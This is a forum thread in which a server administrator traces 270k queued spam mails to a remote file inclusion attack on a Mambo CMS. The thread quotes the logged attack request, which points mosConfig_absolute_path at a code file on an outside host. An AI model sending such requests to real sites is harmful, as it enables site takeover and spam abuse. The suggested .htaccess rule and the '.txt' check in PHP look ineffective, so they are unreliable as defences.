270k of spams in Mail Queue, HELP

K

ktizo

Verified User
Joined
Jan 5, 2006
Messages
46
After some clients complain about mails being blocked, I checked the Mail Queue and shocked to see 270k of spams.

I'm in the midst of clearing the queue but is wondering how can I track where and how the spams was injected.

Anyone with similar experience pls help.
 
ktizo said:
After some clients complain about mails being blocked, I checked the Mail Queue and shocked to see 270k of spams.

I'm in the midst of clearing the queue but is wondering how can I track where and how the spams was injected.

Anyone with similar experience pls help.
Click to expand...

Can you insert headers of messages here?
I would begin from it .

Regards
 
some form injection

I just found out from one of the site logs that it uses a Mambo CMS hole to post:mad: . How to stop this, anyone can help?

index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://in.geocities.com/dnate10/class.txt? HTTP/1.1" 200 22150 "http://domain.com//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://in.geocities.com/dnate10/class.txt?"
 
Get your customer to upgrade Joomla to their latest release (1.5.3 if I remember correctly). Besides that, you can block access by using rewriterules in .htaccess or block the requesting IP performing the GET request (if only 1). The latter will only be a temporary solution though.

I'd strongly advise to upgrade instead of building workarounds.
 
Thanks for that tip but this version of Mambo has been heavily customised, not possible to upgrade. Ive blocked that IP under APF. Can you advise how the codes look like in .htaccess?

Thanks mucho.
 
Maybe something like:

Code: 
RewriteEngine On
RewriteRule ^http://in.geocities.com/dnate10/class.txt\? http://127.0.0.1/ [R=301,L]

Though I'm not much of a rewrite specialist, heh.
 
thanks so much, I'll leave the APF on for now, I'll use your method when there's more IP's involved.

Thanks!
 
This won't save you from the numerous other vulnerabilities that you're gonna be facing, but it'll keep them from including text files that mail bomb you:
Code: 
if(stristr($_GET['mosConfig_absolute_path'],".txt")) die();
Insert that at the top of the index.php file for Mambo, under the "<?php" tag.
 
You must log in or register to reply here.
Back
Top